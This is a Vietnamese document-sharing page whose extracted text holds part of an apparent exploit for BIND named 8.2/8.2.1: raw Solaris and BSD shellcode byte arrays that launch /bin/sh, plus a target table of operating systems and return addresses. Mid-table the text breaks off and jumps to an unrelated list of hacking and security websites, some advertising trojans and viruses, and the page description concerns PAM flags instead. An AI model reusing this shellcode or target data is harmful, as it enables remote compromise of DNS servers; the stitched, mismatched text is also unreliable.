Hacking Security Sites part 37

Chia sẻ: Dqwdasdasd Qwdasdasdasd | Ngày: | Loại File: PDF | Số trang:5

0
77
lượt xem
19
download

Hacking Security Sites part 37

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Requisite: cờ này có ý nói PAM library loại bỏ ngay quá trình xác thực khi gặp bất kỳ thông báo thất bại của module nào. Optional: cờ này ít khi được sử dụng, nó có ý nghĩa là module này được thực hiện thành công hay thất bại cũng không quan trọng, không ảnh hưởng quá trình xác thực Hacking Security Sites part 37

Chủ đề:
Lưu

Nội dung Text: Hacking Security Sites part 37

  1. 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2, 0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7, 0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0, 0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0, 0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0, 0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d, 0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50, 0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80, 0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68, 0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65, 0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63, 0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65, 0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68, 0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65, 0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73,
  2. 0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a, 0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70, 0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31, 0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50, 0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8, 0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd, 0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a, 0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a, 0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38, 0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,
  3. 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "Free Hacking Sites Trong nước: www.hvaforums.net www.vniss.net http://vnbrain.net http://vnsecurity.net http://hackerhp.net http://www.hackerbn.com http://www.hosthcm.com http://thiencung.net http://www.tieutienchua.ws/ http://www.thaonguyentinhyeu.us/ http://tuoimongmo.net.tc/
  4. http://www.shacker.computed.net http://www.hackerclubvn.net http://hacker4all.com http://www.tinhyeutrennet.com http://www.ktcn.net http://www.thienhaxanh.net http://thegioimoi.net/ Top 100 Technology, Security, Coding, Hacking sites : http://www.progenic.com/ Các Sites/Forums về Hacking - Security của nước ngoài (English) http://www.library.2ya.com Thư viện Hacking đầy đủ nhất, tuyệt vời cho người mới bắt đầu học hack, gồm các mục:Hacking tools, trojans, scanners, viruses, exploits, tutorials, hotmail hacks and more http://www.hellboundhackers.org/news.php Welcome to HellBound Hackers. The general source for your Computer Security Needs, We provide a safe and completely legal simulated enviroment to enhance your computer security skills. Please register to benefit from extra features and Challenges! Các sites khác về Hacking - Security: http://packetstormsecurity.org :: Packet Storm http://www.attrition.org :: Attrition http://www.net-security.org/ :: Help Net Security http://www.wiretrip.net/ :: Wiretrip http://www.insecure.org/ :: Insecure.org http://www.nmrc.org/ :: Nomad Mobile Research Centre http://www.toxyn.org/ :: Toxyn http://www.cultdeadcow.com/ :: Cult of the Dead Cow http://www.ccc.de/ :: Chaos Computer Club http://www.openwall.com/john/ :: John the Ripper http://www.openbsd.org/ :: OpenBSD http://www.phreak.be/ :: Phreak.BE http://www.hackershomepage.com/ :: Hackers Home Page http://www.void.be/ :: V0id Sekurity
  5. http://www.t-scripts.com/ :: T Scripts http://www.hacking-software.com/ :: Hacking Software http://www.hacking-program.com/ :: Hacking Program http://internationalcall.pushline.com/ :: Cheapest phone and calling cards http://www.enigmagroup.org/ Enigma Group Hacking Team We are a non profit Hacking Organization here to provide you a safe and legal place to hack and learn some basics in hacking. Register, and join the group today! http://www.eternixy.be/forum/ Hacking tutorials, forums, tools, and downloads. http://www.underground-security.com/ : Updated security feeds 24/7. Lots of awesome software and tutorials. Want to learn about security? Well come in and check it out. Tác giả: freewarez (chongthamnhung.com)  
Đồng bộ tài khoản